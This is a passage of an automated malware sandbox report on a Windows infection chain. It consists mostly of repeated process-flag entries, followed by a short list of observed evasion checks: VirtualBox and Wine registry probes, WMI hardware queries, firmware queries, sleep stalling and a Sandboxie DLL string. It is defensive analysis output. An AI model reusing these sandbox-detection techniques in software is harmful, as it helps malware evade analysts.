Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX (42 identical entries)

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: powershell.exe PID: 352, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 identical entries)
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\1CMweaqlKp.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe System information queried: FirmwareTableInformation (2 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: file300un.exe, 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
